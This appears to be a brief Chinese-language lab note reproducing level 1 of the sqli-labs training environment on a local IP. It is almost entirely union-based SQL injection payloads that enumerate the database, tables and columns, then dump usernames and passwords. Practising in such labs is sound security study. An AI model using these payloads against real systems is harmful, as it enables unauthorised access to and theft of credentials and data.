less 1 复现
1.判断类型
由此判断是字符型漏洞由单引号闭合。
2.判断 字段个数
http://192.168.190.145/sqli-labs/Less-1/?id=1' order by 3--+
3.获取数据库名
-1' union select 1,2,database()--+
4.获取表名
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
5.获取字段名
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+
6.获取数据
-1' union select 1,2,group_concat(username,password) from users--+